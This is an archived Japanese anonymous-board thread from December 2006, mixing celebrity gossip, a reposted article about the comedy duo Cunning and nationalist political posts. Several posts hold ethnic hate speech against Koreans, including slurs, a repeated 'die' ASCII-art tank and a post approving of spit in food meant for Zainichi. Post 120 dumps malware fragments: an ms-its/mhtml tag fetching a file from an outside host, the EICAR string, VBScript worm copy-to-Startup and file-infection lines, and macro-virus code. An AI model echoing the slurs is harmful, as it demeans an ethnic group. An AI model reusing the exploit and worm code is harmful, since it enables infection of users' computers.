ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー

105 :専守防衛さん:2006/12/13(水) 21:28:38
ひどい

106 :専守防衛さん:2006/12/13(水) 22:17:42

【“FIVE”の発音が出来ない韓国人】
アメリカ人での韓国人の印象(動画)
http://bbs.enjoykorea.jp/tbbs/read.php?board_id=thumor&nid=39177



【“C”と“D”の発音が出来ない韓国人】
ロス暴動で黒人が韓国系の店を襲った理由(動画)
http://bbs.enjoykorea.jp/tbbs/read.php?board_id=thumor&nid=39179



107 :専守防衛さん:2006/12/16(土) 05:12:41
事務所の力


好感度も高くない。
下ネタで大顰蹙。
これだけ出まくっても存在感も反響もない。

108 :専守防衛さん:2006/12/16(土) 13:31:23
井川遥って、チョンなの〜?本当か?
マジ、ショック!

109 :専守防衛さん:2006/12/18(月) 22:26:08
コネアゴ!コネアゴ!
ぶっさぶっさ!

110 :専守防衛さん:2006/12/18(月) 22:52:00
>>108
君もあの井川のボケ〜ッとした顔に騙されたくちだな。
大人しそうな顔してるけど、所詮チョン。
すぐにキレてキチガイみたいになるのがみえているぞ。


111 :専守防衛さん:2006/12/19(火) 23:41:34

日本は、「世界史」「日本史」のほかに「近代史」というのを
作って、ちゃんとした歴史教育をしたほうがいいと思う。
そうでないと、韓国や支那が自分達の都合のよいように
捏造した歴史を押し付けられてしまうよ。
そういう歴史教育が「美しい日本」への一歩だと思う。



112 :専守防衛さん:2006/12/19(火) 23:45:44
その通り

113 :専守防衛さん:2006/12/20(水) 00:49:40
美しい国は安倍総理の下でまもなく実現されます。
あと6年内閣を支えましょう!

114 :専守防衛さん:2006/12/20(水) 01:08:38
三鷹の吉祥寺乗っ取り部隊、5000万人を惨殺処刑しました。
焼いてください。

115 :専守防衛さん:2006/12/21(木) 02:56:58

来年復帰するカンニング中島を巡るテレビ局の争奪戦 (ゲンダイネット)
 テレビ・ラジオなど計9本のレギュラー番組を持ち、売れっ子芸人の仲間入りをしたカンニングの竹山隆範(35)に、もうひとつの朗報だ。

 一昨年、急性リンパ球性白血病を発症し長期療養中だった相方の中島忠幸(35)が来年5月にも復帰するというのだ。
およそ2年半ぶりに再結成されるカンニングを巡りテレ朝、フジ、TBS、日テレの4局が熾烈な争奪戦を繰り広げているというから興味深い。
各局の編成マンが番組企画書を手に所属プロのサンミュージックを日参している。

「中島の復活はテレビ的には最高の素材だ。笑いと涙、感動の三拍子が揃っている。
高視聴率が取れないわけがない。笑いは竹山の芸で見せる。涙は白血病に倒れた中島の不運。
感動は中島を支えた家族愛と数千万円といわれる高額な治療費を払いつづけた竹山の友情。
彼は“キレキャラ”芸人というイメージを守るためこの事実を隠してきた」(芸能プロ関係者)

 さらにこんな話も――。

「竹山は中島が復活するまで結婚しないと関係者に宣言した。この話を聞いたくりぃむしちゅーの有田が涙を流したそうです」(若手芸人)

 気になる各局の番組企画だが「ドキュ・バラ形式が圧倒的に多い」(制作幹部)という。テレ朝は「笑いの金メダル」、フジは「金曜プレステージ」、
日テレは「エンタの神様」、TBSは「リンカーン」の番組スタッフが中心となって企画提案を行っているという。

 余談だが、関係者は中島が復活するまで竹山の“賞味期限”が切れないことを祈っているとか。

【2006年11月22日掲載記事】


なのに、なのに・・

116 :専守防衛さん:2006/12/21(木) 06:51:13
…114って、一体何物だ?あちこちの板で、わけわからんこと書いてるが…ヒョットして、変質者?

117 :専守防衛さん:2006/12/21(木) 18:23:26
あかねは馬鹿な乳でかですハイ

118 :専守防衛さん:2006/12/22(金) 18:53:39
でかくねーよ!寄せてることぐらいわかれ禿

そもそも性格に問題大有りなんで。


119 :専守防衛さん:2006/12/23(土) 09:43:26
                                ∧_∧
                       キュラキュラ   ( ・∀・) < チョン死ね!
                              __,,ゝ┼─┼====┐
                    キュラキュラ    | □|   .| |:|ヾ二二二二二(O
        .               __  _|__,|_;||___,| |:|ノ-┬─┘
          /|__/|         |ミ///   /   ~~|ミ|丘百~((==___
 //////////<//////>//////////└┼-┴─┴───┴──┐~~'''''-ゝ-┤
       ⊂    ⊃        ((◎)~~~O~~~~~O~~(◎))三)──)三);
/////////////////////////// ..ゝ(◎)(◎)(◎)(◎) (◎)ノ三ノ──ノ三ノ;*;∵
    「__ __フ



120 :専守防衛さん:2006/12/23(土) 15:36:02
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

121 :専守防衛さん:2006/12/25(月) 20:53:29
                                ∧_∧
                       キュラキュラ   ( ・∀・) < チョン死ね!
                              __,,ゝ┼─┼====┐
                    キュラキュラ    | □|   .| |:|ヾ二二二二二(O
        .               __  _|__,|_;||___,| |:|ノ-┬─┘
          /|__/|         |ミ///   /   ~~|ミ|丘百~((==___
 //////////<//////>//////////└┼-┴─┴───┴──┐~~'''''-ゝ-┤
       ⊂    ⊃        ((◎)~~~O~~~~~O~~(◎))三)──)三);
/////////////////////////// ..ゝ(◎)(◎)(◎)(◎) (◎)ノ三ノ──ノ三ノ;*;∵
    「__ __フ



122 :専守防衛さん:2006/12/26(火) 17:16:57

安倍じゃもうダメだな。

天皇なんていらない!
櫻井よしこを総理に!
勝谷誠彦を外務大臣に!



123 :専守防衛さん:2006/12/26(火) 17:37:45
ホモの勝っちゃんを?

124 :専守防衛さん:2006/12/27(水) 04:01:58
在日っぽい

125 :専守防衛さん:2006/12/28(木) 15:48:43
売り出しに必死

完全にやり過ぎ

126 :専守防衛さん:2006/12/28(木) 18:33:56

日本人輸出向けキムチに丹念に唾を練りこむ
http://plaza.rakuten.co.jp/tinkorosuke/diary/200508010001/


127 :専守防衛さん:2006/12/28(木) 20:31:38
>>126
だから何?
スレタイの趣旨を見ろと小一時間(ry

唾くらいいいじゃん。どうせ在日チョンが食べるだけだし。
まさか、日本人なのにキムチ食べんのwww

39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)